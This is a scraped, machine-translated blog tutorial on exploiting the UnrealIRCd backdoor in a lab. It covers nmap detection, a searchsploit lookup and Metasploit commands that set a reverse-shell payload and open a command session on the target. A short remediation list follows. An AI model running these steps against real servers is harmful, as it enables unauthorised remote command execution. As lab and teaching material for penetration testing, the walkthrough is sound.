当前位置:网站首页>6-25 Vulnerability Exploitation - irc Backdoor Exploitation
6-25 Vulnerability Exploitation - irc Backdoor Exploitation
2022-08-02 01:37:00 【Mountain Rabbit 1】
Introduction to irc
IRC is the English abbreviation of Internet Relay Chat, which is generally called Internet Relay Chat in Chinese.It is a network chat protocol pioneered by Finn Jarkko Oikarinen in 1988.After ten years of development, more than 60 countries in the world have provided IRC services. The working principle of IRC is very simple. You only need to run the client software on your PC, and then connect to an IRC through the Internet using the IRC protocol.on the server.At this time, you can chat through irc, which is characterized by very fast speed, almost no delay when chatting, and only occupies a small bandwidth resource, making the speed faster.All users can chat or whisper about a topic in a place called a "Channel".Each IRC user has a Nickname (nickname) to distinguish different users.
By default, the irc server runs on port 6667.
Detect target irc
Use nmap -sV -p 6667 IP address to detect the target irc version information
nmap -sV -p 6667 192.168.42.137
You can see that the target version information is quickly detected
msf exploits irc backdoor
Use searchsploit to find available POCs
searchsploit UnrealIRCd
You can see if there is any problem with the current software, we choose Backdoor Command Execution (Metasploit) here to use it
use exploit/unix/irc/unreal_ircd_3281_backdoorshow optionsset payload cmd/unix/reverseshow optionsset lhost 192.168.42.128exploit
Use the module in msf for the irc backdoor connection to connect to the shell.
As you can see, the detection is completed, the session is established, and we can execute any command here
Repair Defense
1. Upgrade the software version
2. Replace other software
边栏推荐
- Test Cases: Four-Step Test Design Approach
- go版本升级
- 【ORB_SLAM2】void Frame::AssignFeaturesToGrid()
- 【刷题篇】打家劫舍
- TKU记一次单点QPS优化(顺祝ITEYE终于回来了)
- 管理基础知识9
- DCM 中间件家族迎来新成员
- from origin ‘null‘ has been blocked by CORS policy Cross origin requests are only supported for
- About MySQL data insertion (advanced usage)
- H5画布 canvas(一)canvas简介、绘制圆形矩形、案例饼状图绘制
猜你喜欢
随机推荐
DCM 中间件家族迎来新成员
Go语学习笔记 - gorm使用 - gorm处理错误 Web框架Gin(十)
Test Cases: Four-Step Test Design Approach
Byte taught me a hard lesson: When a crisis comes, you don't even have time to prepare...
Use flex-wrap to wrap lines in flex layout
Redis和MySQL数据一致性问题,有没有好的解决方案?
YGG 公会发展计划第 1 季总结
传统企业数字化转型需要经过几个阶段?
hutool工具-----JSON工具-JSONUtil
Docker安装canal、mysql进行简单测试与实现redis和mysql缓存一致性
Navicat数据显示不完全的解决方法
ECMAScript 2022 正式发布,有你了解过的吗?
60种特征工程操作:使用自定义聚合函数【收藏】
kubernetes之服务发现
信息收集之目录扫描-dirbuster
27英寸横置大屏+实体按键,全新探险者才是安全而合理的做法!
超大规模的产业实用语义分割数据集PSSL与预训练模型开源啦!
Go 1.18 的那些事——工作区、模糊测试、泛型
管理基础知识18
外包干了三年,废了...